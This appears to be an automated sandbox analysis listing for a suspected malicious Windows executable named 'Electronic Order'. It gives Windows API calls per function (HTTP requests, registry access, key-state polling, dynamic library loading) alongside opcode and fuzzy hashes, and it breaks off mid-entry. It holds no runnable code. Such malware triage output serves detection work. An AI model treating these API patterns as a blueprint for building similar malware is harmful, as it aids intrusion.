                                      • Instruction ID: 7cd1438e66e611c8db676ffe88b7f1f11bce71d20255a6bbd90db7db7a85e8eb
                                      • Opcode Fuzzy Hash: e5aaa215f1ff02ece642e4261f0442955a1c8eef62c02d7030f143a514f7bf72
                                      • Instruction Fuzzy Hash: 5D31B3710083469ED721EB60DC46FDB77ECAF54310F14455EF199A30A1DB70A648CBB2
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E31B40
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E31B66
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E31B96
                                      • InternetCloseHandle.WININET(00000000), ref: 00E31BDD
                                        • Part of subcall function 00E32777: GetLastError.KERNEL32(?,?,00E31B0B,00000000,00000000,00000001), ref: 00E3278C
                                        • Part of subcall function 00E32777: SetEvent.KERNEL32(?,?,00E31B0B,00000000,00000000,00000001), ref: 00E327A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: 72327e2d142dc9ef2157d2ed4feffbfe1343ab0c1c1dae1e0f9a722246038b49
                                      • Instruction ID: 6723d3ccf1011c150b6cf220311688ace2ae09ac76c273c7a0d4d86a8f7e796b
                                      • Opcode Fuzzy Hash: 72327e2d142dc9ef2157d2ed4feffbfe1343ab0c1c1dae1e0f9a722246038b49
                                      • Instruction Fuzzy Hash: C421CFB5500208BFEB119F219C89EFFBAECEB89B48F10116EF505B2240EA349D099771
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E466D0
                                      • LoadLibraryW.KERNEL32(?), ref: 00E466D7
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E466EC
                                      • DestroyWindow.USER32(?), ref: 00E466F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: df05d184af9b8e4e2086d9a59999b4938faf36c334e1a9817cd97c8506f4a902
                                      • Instruction ID: e0ac8b71bcdade8c87a800d51fbda7c1a7f3d8a80aa5a01c77415da31fcfb031
                                      • Opcode Fuzzy Hash: df05d184af9b8e4e2086d9a59999b4938faf36c334e1a9817cd97c8506f4a902
                                      • Instruction Fuzzy Hash: 1C21CDB1200206AFEF104F64FC80EBB37ADEB5A768F126629F911B3190C771CC519762
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E2705E
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E27091
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E270A3
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E270DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 757d3231e4ffe2c18221c43ba12a6bfe3a4c6a0ec397144eebf5f14b3cab66b9
                                      • Instruction ID: 791bf8565f34946719bc08bc6ffe9beea46146567b5e3052288e4b12fad994b5
                                      • Opcode Fuzzy Hash: 757d3231e4ffe2c18221c43ba12a6bfe3a4c6a0ec397144eebf5f14b3cab66b9
                                      • Instruction Fuzzy Hash: 13218174604229ABDF209F29EC05E9A77E8AF45724F205619FCE1F72D0E7B09848CB50
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E2712B
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E2715D
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E2716E
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E271A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 8acf7273aec275c51063e956ddd4ab214fa41baf7d8c498dd51e042a4c4314f3
                                      • Instruction ID: cc5331bb5c9fb25a15aa06f521b2fa4950e4180d37cb65df89cb659f409a8806
                                      • Opcode Fuzzy Hash: 8acf7273aec275c51063e956ddd4ab214fa41baf7d8c498dd51e042a4c4314f3
                                      • Instruction Fuzzy Hash: 8921B3756053259BDF209F69AC04AAAB7E8AF55724F201719FCF1F32D0D7B09861CB50
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2AEBF
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E2AF13
                                      • __swprintf.LIBCMT ref: 00E2AF2C
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E4F910), ref: 00E2AF6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: 07ae0353110ddeb65e3d76f57ecc5acda12db2544f629e7815f36dcf04276567
                                      • Instruction ID: 8185d6e25213ef9c6d7722b44d7983ed5f9ec7471d545cc1726d67b6b14397c4
                                      • Opcode Fuzzy Hash: 07ae0353110ddeb65e3d76f57ecc5acda12db2544f629e7815f36dcf04276567
                                      • Instruction Fuzzy Hash: 0A217434A00209AFDB10EF65D985EAEB7B8EF89704B004069F509EB251DB71EE45CB31
                                      APIs
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00E1A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1A399
                                        • Part of subcall function 00E1A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1A3AC
                                        • Part of subcall function 00E1A37C: GetCurrentThreadId.KERNEL32 ref: 00E1A3B3
                                        • Part of subcall function 00E1A37C: AttachThreadInput.USER32(00000000), ref: 00E1A3BA
                                      • GetFocus.USER32 ref: 00E1A554
                                        • Part of subcall function 00E1A3C5: GetParent.USER32(?), ref: 00E1A3D3
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1A59D
                                      • EnumChildWindows.USER32(?,00E1A615), ref: 00E1A5C5
                                      • __swprintf.LIBCMT ref: 00E1A5DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      • Opcode ID: d520db8f64559757496cebc43761fc46bfacab1073bfac669acb2b2c61256266
                                      • Instruction ID: cecfcbd295389aa282f38da21e26851c16b517f278dd46e1c43a68c6402c3a8f
                                      • Opcode Fuzzy Hash: d520db8f64559757496cebc43761fc46bfacab1073bfac669acb2b2c61256266
                                      • Instruction Fuzzy Hash: 2C119071601209ABDF117FA1EC85FFE37A8DF49700F085079F919BA152CA7059858B75
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E22048
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      • Opcode ID: 344aad4716da988dbb646030f5f372bfb8b7a060c8a271aabaad9cab933e87d1
                                      • Instruction ID: ce430a0a744fa787140fec3bfe9980b9b67cab4b06e055989871227be1c09ac4
                                      • Opcode Fuzzy Hash: 344aad4716da988dbb646030f5f372bfb8b7a060c8a271aabaad9cab933e87d1
                                      • Instruction Fuzzy Hash: 14116D7090011ADFCF00EFA4E8819EEB7B4FF55304B5094A8D855B7252EB32690ACB60
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E3EF1B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E3EF4B
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E3F07E
                                      • CloseHandle.KERNEL32(?), ref: 00E3F0FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 3ae8a023925cf99c9bb51937aa0c53e838e1c295ce681c79efa4ea2098b4a9b3
                                      • Instruction ID: 5a529d1b74a8b5c027182736fc0376934121c86586d2834d467fcb0942e2ec83
                                      • Opcode Fuzzy Hash: 3ae8a023925cf99c9bb51937aa0c53e838e1c295ce681c79efa4ea2098b4a9b3
                                      • Instruction Fuzzy Hash: 078182B16007019FD720DF29C85AF6ABBE5EF48B10F14881DF599E7292DBB1AC01CB61
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40388
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E403C7
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E4040E
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00E4043A
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      • Opcode ID: 210e8b615a301de44de013a068ba278e7c2597b0a52fa76eb7718dad8113ff01
                                      • Instruction ID: 1e49c45e6e9f189d85c364a2aca53404dcabe5c18767b047be52a573cab6bf93
                                      • Opcode Fuzzy Hash: 210e8b615a301de44de013a068ba278e7c2597b0a52fa76eb7718dad8113ff01
                                      • Instruction Fuzzy Hash: A6515B31208205AFD704EF65D881F6EB7E8FF84704F04992DF695A7291DB31E905CB62
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E3DC3B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E3DCBE
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E3DCDA
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E3DD1B
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E3DD35
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: e22e502cd11747e90b503c1f65d5505a171ba39c97b22daa1358ec7cf24437c5
                                      • Instruction ID: fb79fa4285e7197eda279c7f70cd9e067d59a774fd4746e2884728d25b5a4cfd
                                      • Opcode Fuzzy Hash: e22e502cd11747e90b503c1f65d5505a171ba39c97b22daa1358ec7cf24437c5
                                      • Instruction Fuzzy Hash: 42511835A042069FCB01EFA8D898DADFBF4EF49314B059169E819AB312DB30AD45CF61
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E2E88A
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E2E8B3
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E2E8F2
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E2E917
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E2E91F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: e814dbc7266aeb536494852d1243d887839f5000779d868aff82765bd6b649af
                                      • Instruction ID: 22f44d6c8e06c399765d8f917ebf40ed463c93316bc88260c55a93fb3b140db9
                                      • Opcode Fuzzy Hash: e814dbc7266aeb536494852d1243d887839f5000779d868aff82765bd6b649af
                                      • Instruction Fuzzy Hash: 5E512839A00215DFCF05EF65D995EAEBBF5EF08314B148099E849AB361CB31AD51CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfe89a8435feaddf7c1264ff63fd65351edc7891265e690d206868e1e4777a11
                                      • Instruction ID: 006f1f7bc946c5545053e7f06206b3bf8d6ae99f459f63bc76e3d0feec693b0a
                                      • Opcode Fuzzy Hash: cfe89a8435feaddf7c1264ff63fd65351edc7891265e690d206868e1e4777a11
                                      • Instruction Fuzzy Hash: A941F139940204AFC720DF28EC48FEDBBA5EB09324F195175F829B72E0E770AD41DA91
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00DC2357
                                      • ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                      • GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                      • GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 171cae56858c27cceeaf9f96d80e313f4d7d4e62653d91a95d392e179d9a71c1
                                      • Instruction ID: d7aae533d9187577f0c9fdca292dbc042a7f4d635d397a11145e5630d2f3d533
                                      • Opcode Fuzzy Hash: 171cae56858c27cceeaf9f96d80e313f4d7d4e62653d91a95d392e179d9a71c1
                                      • Instruction Fuzzy Hash: FD418C3550415AFBDB159F68C844EF9BBB4FB45320F20831AE928A3290C735A964DBA1
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E1695D
                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00E169A9
                                      • TranslateMessage.USER32(?), ref: 00E169D2
                                      • DispatchMessageW.USER32(?), ref: 00E169DC
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E169EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                      • String ID:
                                      • API String ID: 2108273632-0
                                      • Opcode ID: 9d8451414b1443d46dd6ab7fde4509c1d94e801eb74278ac30048f4a9f900c39
                                      • Instruction ID: 51308dba7acc718d0922617454e7ae8089a1120e42a18c0bed42ec6002f83d56
                                      • Opcode Fuzzy Hash: 9d8451414b1443d46dd6ab7fde4509c1d94e801eb74278ac30048f4a9f900c39
                                      • Instruction Fuzzy Hash: 5531A371900246AFDB20CFB5DC44FF67BA8AB42708F1491A9E429F61A1D73598C9D7A0
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00E18F12
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00E18FBC
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E18FC4
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00E18FD2
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E18FDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 8e37dce6603cd90fd3234df3ed014939ad7a4cd31c989586736120690f6bb7e7
                                      • Instruction ID: 8d48c32ca2564f5dd87e3ab262dfd4f1944e3bd7cc385fd2c14c4758cb376b03
                                      • Opcode Fuzzy Hash: 8e37dce6603cd90fd3234df3ed014939ad7a4cd31c989586736120690f6bb7e7
                                      • Instruction Fuzzy Hash: F931EE71A0021DEFDB14CF68DA4CADE7BB6FB09319F104229F925EA2D0C7B09955CB91
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00E1B6C7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E1B6E4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E1B71C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E1B742
                                      • _wcsstr.LIBCMT ref: 00E1B74C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: e2e02939359edfb6b3998bad5fe495b4446edafbb395754bddd072e03e74ebf3
                                      • Instruction ID: 91a5d7282dc5e94332225f8c40fa0057089df25a5e0c7822ffc0b2a2b148b087
